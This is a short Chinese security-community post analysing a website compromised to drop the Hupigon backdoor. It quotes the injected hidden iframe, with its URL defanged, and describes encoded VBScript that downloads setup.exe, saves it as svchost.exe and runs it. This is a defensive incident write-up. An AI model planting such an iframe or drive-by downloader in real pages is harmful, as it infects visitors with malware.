AI 助理
备案控制台
开发者社区 安全 文章 正文

一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

2024-09-29 9
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

该网站首页首部被加入代码:

/-----------
<IFRAME src="hxxp://58***000.128**.to***for.com/x***skj.htm width=0 height=0></IFRAME>
-----------/

x***skj.htm  的内容为escape()加密的VBScript代码,功能为:利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 setup.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

setup.exe 文件大小为301 KB (308,224 字节),Kaspersky 报为 Backdoor.Win32.Hupigon.cge。  


文章标签:
数据安全/隐私保护
游客qeoynko2nmbgk
目录
相关文章
游客qeoynko2nmbgk
|
7天前
|
安全 数据安全/隐私保护
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)
游客qeoynko2nmbgk
14 1
游客qeoynko2nmbgk
|
7天前
|
安全
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
游客qeoynko2nmbgk
21 1
游客qeoynko2nmbgk
|
7天前
|
安全 JavaScript 前端开发
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy
游客qeoynko2nmbgk
16 2
游客qeoynko2nmbgk
|
7天前
|
开发框架 Java .NET
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
游客qeoynko2nmbgk
15 0
游客qeoynko2nmbgk
|
7天前
|
安全 JavaScript 前端开发
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
[07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
游客qeoynko2nmbgk
20 0
游客qeoynko2nmbgk
|
7天前
|
安全 Windows
木马windowout.exe
木马windowout.exe
游客qeoynko2nmbgk
11 0
游客qeoynko2nmbgk
|
7天前
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
游客qeoynko2nmbgk
7 0
游客qeoynko2nmbgk
|
8天前
|
安全
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗1
装了卡巴电脑更卡?原来是Trojan-PSW.Win32.QQPass等盗号木马群作梗1
游客qeoynko2nmbgk
10 0
李火火
|
存储 JSON 安全
phpStudy 小皮 Windows面板 RCE漏洞
详情看文章内叙述
李火火
251 1
sumith
|
5月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
sumith
82 1